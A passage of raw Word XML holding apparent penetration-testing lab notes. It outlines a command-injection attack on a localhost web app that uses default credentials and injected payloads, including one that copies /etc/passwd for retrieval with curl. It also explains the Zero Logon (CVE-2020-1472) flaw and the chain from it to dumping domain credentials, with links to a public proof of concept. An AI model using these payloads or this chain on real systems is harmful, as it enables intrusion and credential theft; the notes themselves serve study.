        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>default credentials admin/password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B30327B" w14:textId="43A2FE4D" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>once logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F029B93" w14:textId="6F1DAC8A" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">chang URL to </w:t>
      </w:r>
      <w:hyperlink r:id="rId174" w:history="1">
        <w:r w:rsidRPr="00DF13D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8081/boardDataWW.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="79EC4159" w14:textId="1756FE5F" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in MAC field, add junk data and submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6945DE" w14:textId="4C63925F" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>intercept with Burpsuite and forward to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F33508" w14:textId="75AFCD39" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746103D5" w14:textId="6E2CF72F" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ping localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E13C501" w14:textId="5D450B0A" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>macAddress=112233445566;+ping+</w:t>
      </w:r>
      <w:r w:rsidR="00087983">
        <w:t>-c+15+127.0.0.1+#&amp;reginfo=0&amp;writeData=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5625D" w14:textId="6FC598A2" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>noticeable delay indicates successful RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D7564" w14:textId="5D71BD80" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7FC006" w14:textId="3932B13D" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change ping section to ;+cp+/etc/passwd+.+#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C651D1" w14:textId="44BEDF59" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in attacker terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B21DC" w14:textId="2880E9A9" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId175" w:history="1">
        <w:r w:rsidRPr="00DF13D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8081/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="08D55D97" w14:textId="5D94520E" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>get passwd file contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1CD55B" w14:textId="35AFBDBF" w:rsidR="00087983" w:rsidRDefault="00087983" w:rsidP="00087983">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0E7BA6" w14:textId="16A5BCE7" w:rsidR="00087983" w:rsidRDefault="009A00E4" w:rsidP="00087983">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Zero Logon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4CB106" w14:textId="1427C65E" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F1B4ED" w14:textId="10B9FD55" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Secura Whitepaper – CVE-2020-1472</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3852FC" w14:textId="6C84DADC" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>allows attacker logon from Zero to Domain Admin under a minute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCD21CF" w14:textId="58E8ED48" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>statistics based attack abusing a feature with MS-NRPC (Microsoft NetLogon Remote Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE3DBB6" w14:textId="40BFCBED" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>critical authentication component of AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FF118D" w14:textId="122F5F6E" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>handles authentication for User and Machine accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CB669" w14:textId="5950CBAD" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Microsoft uses AES-CFB8 for ComputeNetLogonCredential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA283BE" w14:textId="35312789" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>initialization vector used all zeros instead of a random string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6881D" w14:textId="468A4B34" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>messages sent only containing zeros with IV of zero, 1/256 chance of ciphertext being Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4273DE56" w14:textId="4767F8E6" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Machine accounts behave differently than user accounts, with no predefined account lockout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC46D83" w14:textId="36B71ECC" w:rsidR="009A00E4" w:rsidRDefault="009A00E4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>they use a 64+ character alphanum password, negating the need</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2547E9" w14:textId="4A26AC70" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>not meant to be accessed by end users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2256B" w14:textId="3C5BCA36" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Abusing the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286956AE" w14:textId="4C23C082" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Can take Domain Controller’s Machine Account and used granted authentication with Secretsdump.py to dump all of the passwords within the domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D1BAA" w14:textId="4149787C" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Use Zero Logon to bypass DC Machine Account &gt; Run Secretsdump.py to dump credentials &gt; crack/pass domain admin hashes &gt; lateral/vertical movement &gt; profit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA01007" w14:textId="1A8312FB" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Analyzing MS-NRPC Logon Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317BDB1C" w14:textId="47D99DE2" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 – client creates a NetrServerReqChallenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028AD16E" w14:textId="069D191E" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>contains domain controller value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D951F0" w14:textId="0E8EFC8F" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>target device value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7BA2CA" w14:textId="4A5AAC71" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nonce value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139658AD" w14:textId="3F986705" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 – Server receives NetrServerReqChallenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B4FB97" w14:textId="7DE61BE8" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>generates own nonce (Server Challenge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC994FB" w14:textId="685FDBBE" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>send Server Challenge back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407DF199" w14:textId="04D6BBB1" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 – Client computes NetLogon Credentials with Server Challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEB15E5" w14:textId="56BF7361" w:rsidR="005A6F8D" w:rsidRDefault="005A6F8D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses NetrServerAuthenticate3 method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA30AD" w14:textId="265A994A" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>uses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB771F0" w14:textId="4C412484" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>custom binding handle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A22B677" w14:textId="24AF2FAB" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>account name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC46E89" w14:textId="6D3670B0" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>secure channel type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8DFEE8" w14:textId="6EC507EB" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>computer name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CDB3E4" w14:textId="61CD4900" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>client credential string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B765F97" w14:textId="625BEAA0" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>negotiation flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B44E1E0" w14:textId="39541133" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4 – server receives NetrServerAuthenticate request and compute same request itself using known good values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69249CC1" w14:textId="693ED161" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if results are good, server sends back the required info to the client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F364FC" w14:textId="4AB5E164" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>steps above will be looped a certain number of times to attempt to exploit Zero Logon vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94A1A1" w14:textId="6EFF76E4" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5 – if the server calculates the same value, the client will re-verify and once mutual agreement is confirmed, session key is agreed upon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5980FD44" w14:textId="215D3B48" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>session key is used to encrypt communications between client and server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7EF55" w14:textId="05C59EAA" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>from here, normal RPC communication can occur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09648500" w14:textId="089F7408" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683309C8" w14:textId="75F0F306" w:rsidR="00BB6CDE" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId176" w:history="1">
        <w:r w:rsidR="00BB6CDE" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/SecuraBV/CVE-2020-1472</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7582AA94" w14:textId="6031340A" w:rsidR="00BB6CDE" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId177" w:history="1">
        <w:r w:rsidR="00BB6CDE" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/14b020a8-0bcf-4af5-ab72-cc92bc6b1d81</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22C47572" w14:textId="509EEE0B" w:rsidR="00BB6CDE" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidR="00BB6CDE" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrpc/3a9ed16f-8014-45ae-80af-c0ecb06e2db9</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3CF9F6EC" w14:textId="3D1B0BFD" w:rsidR="00BB6CDE" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidR="00BB6CDE" w:rsidRPr="00D63E14">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/master/zerologon_tester.py</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40E5D898" w14:textId="460CDC26" w:rsidR="00BB6CDE" w:rsidRDefault="00BB6CDE" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
